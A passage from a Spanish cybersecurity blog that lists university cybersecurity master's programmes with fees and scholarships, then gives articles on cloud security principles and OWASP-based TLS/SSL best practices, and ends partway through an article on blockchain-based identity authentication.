Centro Nacional de Excelencia Académica en Investigación de Seguridad de la Información / Ciberdefensa y es el hogar del Centro de Sistemas de Información Confiables y Seguridad Cibernética. La misión del Centro de Sistemas de Información Confiables y Seguridad Cibernética (RISCS) es promover y coordinar la investigación y la educación en la confiabilidad del sistema y la seguridad de la información enfatizando un enfoque multidisciplinario que incluye campos tan diversos como computación confiable y segura, la ética y el derecho. ## Lancaster University (Lancaster, Reino Unido) [Imagen: Máster Ciberseguridad Universidad Lancaster] Grados ofrecidos - Máster en Ciberseguridad El programa de Máster en Cibeseguridad de la Universidad de Lancaster prepara a los estudiantes para trabajar dentro de la profesión de seguridad TI, combinando habilidades y técnicas con otras disciplinas como economía, gestión de riesgos, psicología y ciencias sociales. Los módulos técnicos dentro del grado ofrecen las habilidades y los conocimientos requeridos para permitir que los estudiantes obtengan las calificaciones profesionales reconocidas industrialmente como CISSP, Certified Ethical Hacker y CHFI. Security Lancaster es el centro de investigación de seguridad de la Universidad de Lancaster, que sirve como centro de investigación y educación para estudios de seguridad incluyendo seguridad cibernética, compartición de datos y experiencia investigativa en seguridad. Coste - Tiempo completo UK/EU: £8,497 - Tiempo completo Internacional: £17,880 - Tiempo Parcial UK/EU: £4,249 Contratación/tasa de empleo La Universidad de Lancaster es frecuentemente señalada por sus altos niveles de empleo en graduados, una proporción por encima de la media de los estudiantes. En 2010, The Guardian informó que la tasa de empleo de la Universidad de Lancaster está por encima del 90% entre una muestra de 1.560 estudiantes elegidos. Becas ofrecidas La Universidad de Lancaster otorga 3,7 M£ en becas a 400 estudiantes anualmente. La Beca Académica está disponible para estudiantes de U.K. y de las Islas que estudian a tiempo completo, mientras que la Beca de Acceso es otorgada a estudiantes de U.K. que cumplen con las pautas de ingreso. La Beca de Excelencia se otorga a aquellos con destacados perfiles académicos. Todos los estudiantes del Reino Unido, con un ingreso familiar de menos de £ 42.600, se le otorgará una Beca Lancaster de £ 1.000 por año de estudios. Los estudiantes internacionales pueden ser elegidos para una ayuda en las tasas de matrícula. Afiliaciones/Asociaciones La Universidad de Lancaster está designada como Centro Académico EPSRC-GCHQ de Excelencia en Investigación de Seguridad Informática. Lancaster participa y colabora con empresas de diversos sectores y gobiernos, ofreciendo una educación de vanguardia que ofrece un impacto real. ## Newcastle University (Newcastle, Reino Unido) [Imagen: Máster Ciberseguridad Newcastle] Grados ofrecidos - Máster en Ciberseguridad y Resiliencia El programa de máster en Seguridad Informática y Resiliencia de la Universidad de Newcastle combina enseñanza e investigación en seguridad y fiabilidad de sistemas con factores humanos, verificación y sistemas distribuidos, proporcionando a los estudiantes una visión integrada de las diversas tecnologías necesarias para desarrollar sistemas confiables. Con un sólido historial de investigación y desarrollo en computación segura y confiable, Newcastle también ofrece importantes grupos internacionales de investigación y tres centros de investigación enfocados en diversos aspectos del campo de la computación, incluyendo seguridad y resistencia, sistemas confiables, cibercrimen y computación cloud. El Centro para la Ciberdelincuencia y la Seguridad Informática (CCCS), es uno de los cuatro centros de investigación de la Universidad, la cual realiza investigaciones en ciberseguridad en conjunto con la aplicación de la ley. Otros centros de investigación de la universidad incluyen el Centro de Fiabilidad de Software (CSR) y el Instituto Digital (DI). Costes - Tiempo completo: £6,165 - Media jornada: £3,085 - Internacional: £17,080 Contratación/tasa de empleo Los graduados de los programas de pregrado en la Universidad de Newcastle tienen excelentes perspectivas de carrera, con tasas de empleo de más del 90% en una variedad de programas de estudio, y dos tercios de los graduados obtienen empleo dentro de los cuatro meses posteriores a la graduación. Becas ofrecidas La Universidad de Newcastle ofrece becas parciales para estudiantes internacionales con buenas calificaciones académicas. Las becas varían según el país de origen. Se ofrecen Descuentos Familiares Internacionales (IFD) para alentar a los familiares de estudiantes internacionales actuales a continuar sus estudios en la Universidad de Newcastle, con un descuento del 10% de la matrícula anual. Otras becas disponibles para estudiantes internacionales incluyen la Beca Fulbright, British Marshall Scholarships, Beca Internacional de Postgrado de la Universidad de Newcastle (NUIPS) entre otras. Afiliaciones/Asociaciones El Centro de Ciberdelincuencia y Seguridad Informática en Newcastle es designado como un Centro Académico de Excelencia en Investigación de Seguridad Cibernética por GCHQ en el Reino Unido. El CCCS celebra varios eventos cada año para comprometerse con familias y empresas. Centrado en las necesidades de las empresas locales y la comunidad residencial, CCCS tiene como objetivo hacer la economía digital más segura, un esfuerzo apoyado por el Foro de Fraude del Nordeste (NEFF). ## Carnegie Mellon University (Pittsburgh, Estados Unido) [Imagen: Master en Ciberseguridad Universidad Carnegie Mellon University] Grados ofrecidos - Máster en Seguridad y Aseguramiento de la Información - Máster en Seguridad de la Información - Máster en Tecnología de la Información en Seguridad de la Información - **Máster en Tecnología de la Información en Ingeniería de Privacidad** - Máster en Política y Gestión de la Seguridad de la Información Carnegie Mellon es una universidad de primer nivel para estudiantes que desean continuar los estudios de posgrado en seguridad de la información o tecnología de la información, ofreciendo una variedad de programas de master con especializaciones en áreas clave que posicionan a los graduados como profesionales en demanda en el panorama actual de TI. Con más de dos décadas de liderazgo en Tecnología de la Información, Carnegie Mellon CyLab es una iniciativa universitaria que involucra a más de cincuenta profesores y cien estudiantes graduados de más de seis departamentos diferentes y escuelas, la cual fue nombrada escuela superior para la ciberseguridad en el 2014 por el Instituto Ponemon. Coste - Carnegie Institute of Technology: $42,000 por año - Information Networking Institute: $42,000 por año - School of Computer Science: $42,000 por año Afiliaciones/Asociaciones Carnegie Mellon University es designada por la NSA como Centro Nacional de Excelencia Académica en Seguridad de la Información (IA) / Ciberdefensa (CD). El centro de investigación Carnegie Mellon CyLab trabaja en estrecha colaboración con el US-CERT, como un recurso vital en el esfuerzo para abordar las vulnerabilidades cibernéticas que amenazan la seguridad nacional y la económica, CyLab está estrechamente afiliado al Centro de Coordinación CERT, un centro líder reconocido internacionalmente de experiencia de seguridad en Internet. ## Kennesaw State University (Kennesaw, Estados Unidos) [Imagen: Universidad Kennesaw State Master en Ciberseguridad] Grados ofrecidos - Licenciatura en Seguridad de la Información - Certificado de Pregrado en Seguridad de la Información - Certificado De Posgrado En Seguridad De La Tecnología De la Información - Certificado de Posgrado en Seguridad y Aseguramiento de la Información La Universidad Estatal de Kennesaw es el hogar del Centro para la Educación de la Seguridad de la Información, según publicó la Revista de Seguridad de la Información (ISEJ), conocido así también por ser el anfitrión regional de la Competición de Ciberdefensa estratégica del Sureste de Estados Unidos. Kennesaw State University se encuentra en sexto lugar entre las Escuelas y Colegios de Seguridad de la Información por la lista publicada por Study.com en los Estados Unidos (Recordamos que mostramos los master sin ningún orden concreto, basándonos en varias listas). En su programa de Licenciatura en Seguridad y Aseguramiento de la Información, Kennesaw State University ofrece un Certificado de Pregrado en Seguridad y Aseguramiento de la Información y dos certificados según el nivel en los posgrados. Es famosos también su MOOC en ciberseguridad, el cual puede cursar cualquier persona. Becas ofrecidas La Universidad Estatal de Kennesaw ofrece becas basadas en los méritos y las necesidades de los estudiantes. Becas del Senado para los empleados de KSU matriculados en cursos acreditados dentro del sistema universitario de Georgia, y becas de la Fundación KSU. Afiliaciones/Asociaciones El CISE tiene un programa concertado para involucrar a las instituciones con el fin de crear alianzas y unir esfuerzos. Los acuerdos de asociación estándar indican específicamente un acuerdo para compartir currículos, el conocimiento de la facultad y el trabajo hacia la reciprocidad de los créditos de la división, hasta la fecha, nueve instituciones han firmado como socios de dicha alianza académica. El CISE también busca alianzas en la industria y actualmente está asociado con el Security Executive Council y el Sun Trust Bank. Kennesaw State University ha sido designado como Centro Nacional de Excelencia Académica en Educación de Seguridad de la Información por la NSA / DHS. --- # Principios de Seguridad Cloud URL: https://ciberseguridad.blog/principios-de-seguridad-cloud/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-07-24 Actualizado: 2026-09-29 Tema: Operaciones de Seguridad > Hace tiempo que la posibilidad de migración a la nube por parte de las empresas es más que una posibilidad. Es complicado no encontrar una empresa que no se haya planteado a estas alturas la migración total o parcial de su entorno IT, pero este planteamiento, debe ir acompañado de unos principios básicos de seguridad en cloud. Hoy hemos amanecido con la noticia de que la Sweden’s Transport Agency ha expuesto todos sus datos con la migración realizada a la cloud, por ello, que mejor que hoy para Hace tiempo que la posibilidad de migración a la nube por parte de las empresas es más que una posibilidad. Es complicado no encontrar una empresa que no se haya planteado a estas alturas la migración total o parcial de su entorno IT, pero este planteamiento, debe ir acompañado de unos principios básicos de seguridad en cloud. Hoy hemos amanecido con la noticia de que la Sweden’s Transport Agency ha expuesto todos sus datos con la migración realizada a la cloud, por ello, que mejor que hoy para hablaros de los principios de seguridad en Cloud. - Protección de los datos en la comunicación: Las redes de tránsito de datos de usuario deben estar adecuadamente protegidas contra la manipulación indebida y posibles "espionaje". - Protección de activos y resiliencia:Los datos del usuario y los activos que lo almacenan o procesan deben protegerse contra manipulación física, pérdida, daño o incautación. - Segmentación entre usuarios: Un usuario malintencionado o comprometido del servicio no debe ser capaz de afectar el servicio o los datos de otro. - Marco de gobierno: El proveedor de servicios debe tener un marco de gobierno de la seguridad que coordine y dirija su gestión del servicio y la información dentro de él. - Seguridad operativa: El servicio debe ser operado y gestionado de forma segura para impedir, detectar o prevenir ataques. Una buena seguridad operativa no debe requerir procesos complejos o burocráticos, que consumen mucho tiempo o sean caros. - Seguridad del personal: Donde el personal del proveedor de servicios tenga acceso a sus datos y sistemas necesita un alto grado de confianza en su confiabilidad. La evaluación minuciosa, apoyada por un entrenamiento adecuado, reduce la posibilidad de compromiso accidental o malicioso por parte del personal del proveedor de servicios. - Desarrollo seguro: Los servicios deben ser diseñados y desarrollados para identificar y mitigar las amenazas de seguridad. Aquellos que no lo sean pueden ser vulnerables a problemas de seguridad que podrían comprometer sus datos, provocar la pérdida de servicio o permitir otras actividades maliciosas. - Seguridad de la cadena de suministro: El proveedor de servicios debe asegurarse de que su cadena de suministro apoya satisfactoriamente todos los principios de seguridad que el servicio pretende implementar. - Gestión segura de usuarios: El proveedor debe poner a disposición las herramientas adecuadas para poder administrar con seguridad el servicio. Interfaces de gestión y procedimientos adecuados son una parte vital de la seguridad, la prevención de acceso no autorizado y la alteración de recursos, aplicaciones y datos. - Identidad y autenticación:Todas las interfaces de acceso a servicios deben restringirse a personas autenticadas y autorizadas. - Protección de la interfaz externa: Todas las interfaces externas o menos confiables del servicio deben ser identificadas y debidamente securizadas. - Administración de servicios seguros: Los sistemas utilizados para la administración de un servicio en la nube tendrán acceso privilegiado a ese servicio. Su compromiso tendría un impacto significativo, incluyendo los medios para evitar los controles de seguridad y robar o manipular grandes volúmenes de datos. - Auditoría en usuarios:Se le deben proporcionar los registros de auditoría necesarios para supervisar el acceso a su servicio y los datos que contiene en el mismo. El tipo de información de auditoría disponible tendrá un impacto directo en la capacidad de detectar y responder a actividades inapropiadas o maliciosas dentro de plazos razonables. - Uso seguro del servicio: La seguridad de los servicios en la nube y los datos contenidos en ellos pueden verse comprometidos si se utiliza mal el servicio. En consecuencia, el propietario tendrá ciertas responsabilidades al utilizar el servicio para que los datos estén adecuadamente protegidos. Ante la gran variedad de opciones de despliegues de Cloud (tanto SaaS, PaaS o IaaS; pública o privada; alojamiento interno y externo e híbridos ), ningún conjunto de controles de seguridad pueden cubrir cualquier tipo de circunstancias. Y como en cualquier otra situación, será cada organización la que debería adoptar una estrategia de migración a Cloud basada en un análisis de riesgos adecuado. Todos estos principios podrían llevar un capitulo a parte, teniendo entidad propia para cada uno de ellos, debiendo darlos la importancia que cada uno se merece, pero creo que esta primera aproximación de los principios de seguridad en Cloud, nos da una visión a grandes rasgos de las necesidades que debemos ofrecer o demandar a la hora de buscar una estrategia Cloud en nuestra organización. Tenemos mucho que aprender en relación a una estrategia cloud adecuada, pero lo que si que esta claro, es que debemos plantearnos todo esto, de forma anterior a adoptarla, para no llevarnos sustos imprevistos, como le ha pasado a la Agencia de Transportes Sueca. --- # Buenas prácticas TLS / SSL URL: https://ciberseguridad.blog/buenas-practicas-tls-ssl/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-07-16 Actualizado: 2026-10-04 Tema: Cifrados y Algoritmos > El uso de certificados y cifrado de comunicaciones TLS / SSL , es una practica más que necesaria. Descubre como implementarlo de forma segura. ! ENTRA ¡ Prácticamente a diario, se deben tomar decisiones de seguridad relacionadas con la arquitectura de los proyectos, o por lo menos así nos pasa si trabajas en la gerencia de seguridad y ciberseguridad de la compañía, en la que el equipo de seguridad acompaña a los arquitectos y jefes de proyectos en estas decisiones. Por ello, veremos a lo largo del post, un modelo sencillo a seguir cuando se implementa la protección de la capa de transporte para una aplicación. Aunque el concepto de SSL es conocido por muchos, los detalles reales y las decisiones específicas de seguridad de la implementación, a menudo son mal entendidos y con frecuencia resultan en despliegues inseguros. Es por esto que trataremos de establecer reglas claras que proporcionen orientación sobre cómo diseñar y configurar de forma segura la seguridad de la capa de transporte para una aplicación. Centrándonos en el uso de SSL / TLS entre una aplicación web y un navegador web, fomentando también el uso de SSL / TLS u otras tecnologías de cifrado de red, como VPN, back-end y otras conexiones no basadas en navegador. Pero antes de nada, os mostrare los resultados de intentar predicar con el ejemplo en nuestro blog [Imagen: Chequear SSL / TLS] Esto, nos cuesta visitas, ya que son muchas las personas que no tiene un navegador o sistema operativo que acepte un certificado de 4096, pero como os indico más abajo, con un cifrado de 2048, sería suficiente. Os recomiendo también otro post anterior Intercepción SSL , sacrificando la ética por la seguridad ## Decisión de arquitectura Debe tomar una decisión de arquitectura para determine el método apropiado para proteger los datos cuando se está transmitiendo. Las opciones más comunes disponibles para las empresas son las redes privadas virtuales (VPN) o un modelo SSL / TLS comúnmente utilizado por las aplicaciones web. El modelo seleccionado está determinado por las necesidades empresariales de la organización en particular. Por ejemplo, una conexión VPN puede ser el mejor diseño para una asociación entre dos empresas que incluye el acceso mutuo a un servidor compartido a través de una variedad de protocolos. A la inversa, una aplicación web para empresas que se enfrenta a Internet probablemente sería mejor atendida por un modelo SSL / TLS. TLS es principalmente una defensa contra ataques man in the middle . Un modelo de amenaza de TLS es aquel que comienza con la pregunta "¿Cuál es el impacto de la capacidad de un atacante de observar, interceptar y manipular el tráfico entre el cliente y el servidor?" . A lo largo del post nos centraremos en las consideraciones de seguridad cuando se selecciona el modelo SSL / TLS. Modelo que como hemos dicho, es de uso frecuente para aplicaciones web de acceso público. ## Proporcionar protección de capa de transporte con SSL / TLS El principal beneficio de la seguridad de la capa de transporte es la protección de los datos de la aplicación web de la divulgación y modificación no autorizada cuando se transmite entre clientes (navegadores web) y el servidor de aplicaciones web y entre el servidor de aplicaciones web y otros servidores o componentes empresariales. El componente de validación de servidor de TLS proporciona autenticación del servidor al cliente. Si está configurado para requerir certificados del lado del cliente, TLS también puede desempeñar un papel en la autenticación del cliente en el servidor. Sin embargo, en la práctica, los certificados del lado del cliente no se utilizan a menudo en lugar de nombre de usuario y contraseña basada en modelos de autenticación para estos. TLS también proporciona dos beneficios adicionales que comúnmente se pasan por alto: Garantías de integridad y prevención de repetición. Un flujo de comunicación TLS contiene controles integrados para evitar la manipulación de cualquier parte de los datos cifrados. Además, los controles también están incorporados para evitar que una secuencia capturada de datos TLS se vuelva a reproducir en un momento posterior. Cabe señalar que TLS proporciona las garantías anteriores a los datos durante la transmisión. Pero TLS no ofrece ninguna de estas ventajas de seguridad a los datos que están en reposo. Por lo tanto, se deben agregar controles de seguridad adecuados para proteger los datos mientras están en reposo dentro de la aplicación o dentro de los almacenes de datos. - Debemos utilizar TLS, ya que SSL no se considera aconsejable para la seguridad. - Todas las páginas deben ser servidas a través de HTTPS. Esto incluye css, scripts, imágenes, solicitudes AJAX, datos POST y terceros. De no hacerlo crea un vector para los ataques man in the middle. - Sólo proteger las páginas autenticadas con HTTPS, no es suficiente. Una vez que hay una solicitud en HTTP, los ataques man in the middle son posibles, pudiendo evitarlo haciendo que los usuarios lleguen a las páginas protegidas. - El HTTP Strict Transport Security Header debe ser utilizado y cargado previamente en los navegadores . Esto indicará a los navegadores compatibles que sólo utilicen HTTPS, incluso si se solicita el uso de HTTP. - Las cookies deben estar marcadas como seguras ### Requerimientos básicos Los requisitos básicos para el uso de TLS son: acceso a una infraestructura de clave pública (PKI) con el fin de obtener certificados, acceso a un directorio o un respondedor del protocolo de estado de certificados en línea (OCSP) para verificar el estado de revocación de certificados y admitir una configuración mínima de las versiones de protocolos y opciones de protocolo para cada versión. ### SSL vs. TLS Los términos Secure Socket Layer (SSL) y TLS (Transport Layer Security) se utilizan a menudo de forma intercambiable. De hecho, SSL v3.1 es equivalente a TLS v1.0. Sin embargo, las diferentes versiones de SSL y TLS son compatibles con los navegadores web modernos y con los frameworks y plataformas web más modernos. Para el fin de este post, nos referiremos a la tecnología genéricamente como TLS. Las recomendaciones sobre el uso de los protocolos SSL y TLS, así como el soporte del navegador para TLS os la mostrare mas adelante con uno de los principios básicos. [Imagen: SSL vs TLS] ### Diseño de un servidor seguro Veremos a los largo de este punto, una serie de reglas obtenidas de la guía de buenas practicas de SSL / TLS marcadas por OWASP . Como en todo proyecto tecnológico dentro de la empresa, debemos hacer un balance entre coste y seguridad, y sentido común dentro del uso que se haga del mismo, lo cual marcará las practicas que debemos obtener, pero para llegar a ello, marcaremos primeramente el buen uso SSL / TLS con esta serie de reglas. ### Utiliza TLS u otro transporte fuerte end to end Todas las redes, tanto externas como internas, deben utilizar TLS o un mecanismo equivalente de seguridad de la capa de transporte para toda comunicación. No basta con afirmar que el acceso a la red interna está "restringido a los empleados". Numerosos compromisos de datos recientes han demostrado que la red interna puede ser violada por los atacantes. En estos ataques, los sniffers se han instalado para acceder a los datos confidenciales no cifrados enviados en la red interna. La página de inicio de sesión y todas las páginas autenticadas posteriores deben tener acceso exclusivo a través de TLS. La página inicial de inicio de sesión, denominada "página de inicio de sesión", debe ser servida a través de TLS. La no utilización de TLS para la página de inicio de sesión permite a un atacante modificar la acción del formulario de inicio de sesión, haciendo que las credenciales del usuario se publiquen en una ubicación arbitraria. Si no se utiliza TLS para páginas autenticadas después del inicio de sesión, el atacante puede ver el ID de sesión sin cifrar y comprometer la sesión autenticada del usuario. Incluso la comercialización u otros sitios web de baja seguridad todavía requieren TLS. La falta de TLS conduce a una falta de integridad que permite a los atacantes modificar el contenido en tránsito. ### No proporcionar páginas no TLS en contenido seguro Todas las páginas que están disponibles a través de TLS no deben estar disponibles en una conexión que no sea TLS. Un usuario puede marcar inadvertidamente o escribir manualmente una URL a una página HTTP (por ejemplo, http:// #example# .com/cuenta ) dentro de la parte autenticada de la aplicación. Si esta solicitud es procesada por la aplicación, la respuesta y cualquier dato sensible se devolverán al usuario a través del HTTP en texto sin cifrar. ### No mezclar contenido TLS y no TLS Una página que está disponible a través de TLS debe estar compuesta completamente de contenido que se transmite a través de TLS. La página no debe contener ningún contenido que se transmita a través de HTTP sin cifrar. Esto incluye contenido de sitios de terceros no relacionados. Un atacante podría interceptar cualquiera de los datos transmitidos a través del HTTP no cifrado e inyectar contenido malicioso en la página del usuario. Este contenido malintencionado se incluiría en la página incluso si la página general se sirve en TLS. Además, un atacante puede robar la cookie de sesión del usuario que se transmite con cualquier petición que no sea TLS. Esto es posible si el indicador 'seguro' de la cookie no está establecido. Para ello, veremos continuación la regla del uso de flan en la cookie. ### Usar Secure Cookie Flag El indicador "Seguro" debe estar configurado para todas las cookies del usuario. Si no se utiliza el indicador "seguro", el atacante puede acceder a la cookie de sesión engañando al navegador del usuario para que envíe una solicitud a una página sin cifrar del sitio. Este ataque es posible incluso si el servidor no está configurado para ofrecer contenido HTTP ya que el atacante está supervisando las solicitudes y no le importa si el servidor responde con un 404 o no responde en absoluto. ### Mantener datos confidenciales fuera de la URL Los datos confidenciales no deben transmitirse mediante argumentos en la URL. Siendo más correcto almacenar los datos confidenciales en un repositorio del lado del servidor o dentro de la sesión del usuario. Cuando se utiliza TLS, los argumentos y los valores de la URL se cifran durante la transmisión. Sin embargo, hay dos métodos en los que los argumentos de la URL y los valores podrían estar expuestos. - Toda la URL se almacena en caché dentro del historial del navegador del usuario local. Esto puede exponer los datos confidenciales a cualquier otro usuario de la estación de trabajo. - La URL completa queda expuesta si el usuario hace clic en un enlace a otro sitio HTTPS. Esto puede exponer los datos confidenciales dentro del campo de referencia al sitio de terceros. Esta exposición se produce en la mayoría de los navegadores y sólo se producirá en las transiciones entre dos sitios TLS. Por ejemplo, un usuario que sigue un enlace en https:// ejemplo.com que conduce a https:// Otroejemplo.com expondría la URL completa de https:// ejemplo.com (incluidos los argumentos de URL) en el encabezado de referencia (dentro de la mayoría de los navegadores). Este no sería el caso si el usuario siguiera un enlace en https:// ejemplo.com a http:// OtroHTTPejemplo.com ### Evitar el almacenamiento en caché de datos confidenciales El protocolo TLS proporciona confidencialidad sólo para los datos en tránsito, pero puede ayudarnos con posibles problemas de pérdida de datos en los proxies de clientes o proxies intermediarios. Como resultado, es prudente instruir a estos nodos para que no almacenen en caché ni persistan datos sensibles. Una opción es agregar los encabezados anticaching a las respuestas HTTP relevantes (por ejemplo, "Cache-Control: no-cache, no-store" y "Expires: 0" para la cobertura de muchos navegadores modernos a partir de 2013). Para la compatibilidad con HTTP / 1.0 (es decir, cuando los agentes de usuario son realmente antiguos o el servidor web funciona alrededor de peculiaridades forzando HTTP / 1.0) la respuesta también debe incluir el encabezado "Pragma: no-cache". Podemos disponer de más información en HTTP 1.1 RFC 2616 , sección 14.9. ## Certificado de servidor Ahora nos toca hablar de la importancia de la configuración de los certificados a nivel servidor, esta parte esta muy en entredicho sobre cuales son las mejores practicas, sopesando siempre coste/seguridad/necesidad para los proyectos, pasaremos a ver las reglas marcadas por OWASP sobre los requisitos del certificado a nivel servidor. ### Utilizar claves fuertes y protegerlas La clave privada utilizada para generar la clave de cifrado debe ser lo suficientemente fuerte para la vida útil de la clave privada y el certificado correspondiente. La mejor práctica actual es seleccionar un tamaño de clave de al menos 2048 bits. Además, la clave privada debe almacenarse en un lugar protegido de acceso no autorizado. ### Utilizar un certificado que admita los nombres de dominio necesarios Un usuario nunca debe obtener un error de certificado, incluyendo desajustes de dominio o host, o certificados caducados. Si la aplicación está disponible en https:// www.ejemplo.com y https:// ejemplo.com, se debe presentar un certificado apropiado, o certificados, para acomodar la situación. La presencia de errores de certificado, desensibiliza a los usuarios a los mensajes de error de TLS y aumenta la posibilidad de que un atacante pueda lanzar un ataque de phishing o un ataque de man in the middle. Por ejemplo, si consideramos una aplicación web accesible en https:// abc.ejemplo.com y en https:// xyz.ejemplo.com . Se debe adquirir un certificado para el host o servidor abc.ejemplo.com , un segundo certificado para el host o servidor xyz.ejemplo.com y en ambos casos, el nombre de host estaría presente en el nombre común del sujeto (CN). Como alternativa, los Subject Alternative Name (SANs) pueden utilizarse para proporcionar una lista específica de varios nombres donde el certificado es válido. En el ejemplo anterior, el certificado podría enumerar el CN ​​de Asunto como ejemplo.com y enumerar dos SAN: abc.ejemplo.com y xyz.ejemplo.com . Estos certificados a veces se denominan "certificados de dominio múltiple". ### Utilizar nombres completamente calificados en certificados Se deben usar nombres totalmente calificados en el campo de nombre DNS y no usar nombres no calificados ('www'), nombres locales ('localhost') o direcciones IP privadas (192.168.1.1) en el campo de nombre DNS . Los nombres sin calificar, los nombres locales o las direcciones IP privadas violan la especificación del certificado. ### No utilizar certificados comodín Debemos abstenernos de utilizar certificados comodín. Aunque son convenientes para eludir las molestas instrucciones de los usuarios, también violan el principio del mínimo privilegio y le pide al usuario que confíe en todas las máquinas del sistema, incluidas las máquinas de desarrollo, del vestíbulo , del gimnasio ... Obtener acceso a la clave privada es un ejercicio para el atacante, pero todo ello es mucho más fácil cuando se almacena en sistemas de archivos sin protección. ### No utilizar direcciones RFC 1918 en certificados Los certificados no deben utilizar direcciones privadas RFC 1918 es la asignación de direcciones para intranets . Las direcciones privadas son para la Autoridad de Números Asignados de Internet (IANA) las direcciones reservadas 192.168 / 16, 172.16 / 12 y 10/8. Los certificados emitidos con direcciones privadas violan las directrices del certificado EV . Además, Peter Gutmann escribe en Ingeniería de Seguridad: > "This one is particularly troublesome because, in combination with the router-compromise attacks... and ...OSCP-defeating measures, it allows an attacker to spoof any EV-certificate site" ### Utilizar una autoridad de certificación apropiada para la base de usuarios de la aplicación Un usuario de la aplicación nunca debe obtener una advertencia de que el certificado fue firmado por una autoridad desconocida o no confiable. Los usuarios de la aplicación deben tener acceso al certificado público de la autoridad de certificación que emitió el certificado del servidor. Para los sitios web accesibles desde Internet, el método más efectivo para lograr este objetivo es comprar el certificado TLS de una autoridad de certificación reconocida. Los navegadores de Internet populares ya contienen los certificados públicos de estas autoridades de certificación reconocidas. Las aplicaciones internas con un número de usuarios limitados pueden utilizar una autoridad de certificación interna siempre que su certificado público se distribuya de forma segura a todos los usuarios. Sin embargo, recuerde que todos los certificados emitidos por esta autoridad de certificación serán de confianza para los usuarios. Por lo tanto, debemos utilizar controles para proteger la clave privada y asegúrese de que sólo las personas autorizadas tengan la capacidad de firmar dichos certificados. El uso de certificados auto firmados nunca es aceptable. Los certificados auto-firmados niegan el beneficio de la autenticación desde el punto final y también disminuyen significativamente la capacidad de un individuo para detectar un ataque man in the middle. ### Proporcionar todos los certificados necesarios Los clientes intentan resolver el problema de identificar un servidor o un host usando el certificado PKI y X509. Cuando un usuario recibe un certificado de servidor o host, el certificado debe ser validado de nuevo a una autoridad de certificación raíz de confianza. Esto se conoce como validación de ruta. Puede haber uno o más certificados intermedios entre el certificado de entidad final (servidor o host) y el certificado raíz. Además de validar ambos extremos, el usuario también tendrá que validar todos los certificados intermedios. La validación de todos los certificados intermedios puede ser complicada porque el usuario puede no tenerlos localmente. Este es un problema conocido de PKI llamado “Which Directory?". Para evitar el problema “Which Directory?", un servidor debe proporcionar al usuario todos los certificados necesarios utilizados en una validación de ruta. ### Plan de depreciación SHA-1 Para evitar que los usuarios finales presenten advertencias progresivas de certificados, las organizaciones deben tratar proactivamente planes de depreciación del uso SHA-1 en los fabricante del navegador. El plan de Google Chrome es probablemente el más específico y agresivo en este momento: Gradually sunsetting SHA-1 Si la organización no tiene problemas de compatibilidad con SHA256 , lo correcto sería mover los certificados del sitio / cadena para firmarlo con SHA256. Pero si existen problemas, nos deberíamos haber asegurado que los certificados SHA-1 expirasen antes del 1/1/2017. ## Proporcionar protección de capa de transporte para back-end y otras conexiones Aunque no es el foco del post, pero mi búsqueda de esta información vino motivado por ello, debemos destacarse que la protección de la capa de transporte es necesaria para las conexiones de back-end y cualquier otra conexión donde se intercambian datos sensibles o donde se establece la identidad del usuario. Si no se implementa una seguridad de capa de transporte efectiva y robusta, se expondrán datos sensibles y se minará la eficacia de cualquier mecanismo de autenticación o control de acceso. ### Error de red interna segura La red interna de una corporación no es inmune a los ataques. Muchos intrusos de perfil de conocimiento alto han perpetrado atacantes que han accedido a la red interna y luego han utilizado sniffers para capturar datos no cifrados mientras atravesaban la red interna. ### Protocolo y configuración de cifrado para back-end y otras conexiones Es importante proporcionar TLS para la comunicación de servidor a servidor además de la comunicación de cliente a servidor. Debemos asegurar la configuración 'cliente' del servidor que se utiliza para backend y otras conexiones de acuerdo con el protocolo de servidor y la configuración de cifrado . Y asegurarnos de desactivar los protocolos de cifrado inseguros. (Por ejemplo, sólo admitir una configuración mínima sólida cuando el servidor actúa como "cliente"). --- # Blockchain para la autenticación y verificación de nuestra identidad URL: https://ciberseguridad.blog/blockchain-para-la-autenticacion-y-verificacion-de-nuestra-identidad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-06-25 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > El mayor obstáculo para migrar muchos servicios online, es la capacidad de asegurar los datos y verificar la identidad de los usuarios del mismo. Actualmente, la autenticación online se basa en una contraseña y en raras ocasiones el uso de autenticación de doble factor. El problema con estos métodos es que las contraseñas son notoriamente inseguras y la autenticación de doble factor generalmente se basa en el envío de un código a través de SMS o un servicio tercero. Una solución a este problema El mayor obstáculo para migrar muchos servicios online, es la capacidad de asegurar los datos y verificar la identidad de los usuarios del mismo. Actualmente, la autenticación online se basa en una contraseña y en raras ocasiones el uso de autenticación de doble factor. El problema con estos métodos es que las contraseñas son notoriamente inseguras y la autenticación de doble factor generalmente se basa en el envío de un código a través de SMS o un servicio tercero. Una solución a este problema podría ser la cadena blockchain, ya que los mismos principios criptográficos podrían aplicarse a la autenticación. Al distribuir un ledger entre todos los miembros de la red, la autenticación blockchain erradica el poder modificar maliciosamente el ledger. Cada vez que se agrega una "transacción" o bloque de datos a la cadena, la mayoría de la red debe verificar su validez, lo que garantiza su integridad. Podríamos entonces utilizar un cifrado de clave pública, como el cifrado RSA para enviar credenciales de forma segura y el destinatario podría verificar el envío contra una entrada en la cadena blockchain inmutable, resultando una forma increíblemente segura y confiable para la verificación de identidad. ## ¿Por qué nuestra actual identidad es insegura? Las credenciales de correo electrónico y las contraseña son fáciles de romper, como pudimos ver en la última violación de Yahoo con 500 millones de cuentas. Si tenemos que presentar el DNI cuando pagamos con tarjeta, existe el riesgo de dar a alguien más información de la que necesita. Si pagamos en un restaurante, el mismo sólo necesita saber que usted es quien dice que es y su fecha de nacimiento, pero también estamos proporciona la dirección, la altura, el peso, el color del pelo y el color de los ojos, información que puede ser crucial para robar identidad. La solución ideal sería una forma de autenticación que sólo otorgue acceso a cierta información y eliminando la necesidad de que cada proveedor de servicios almacene credenciales para cada cliente. Blockchain puede ofrecer este enfoque mediante la descentralización de la propiedad de las credenciales y disponibilidad en una cadena inmutable de datos, como vimos en el post Blockchain identity management. Estos datos, en lugar de ser almacenados por una aplicación, se almacenan en un "libro compartido". Este ledger compartido es descargado por cada usuario individual, reflejando un registro de cada transacción realizada. ## ¿Por qué blockchain es seguro? La cadena de bloques se basa en tres grandes pilares ( consenso, distribución y sin confianza ) y la seguridad se deriva de una prueba del trabajo de resolución de problemas. Donde es necesario tomar una gran cantidad de potencia computacional para completarlos y por lo tanto, donde a una sola persona puede 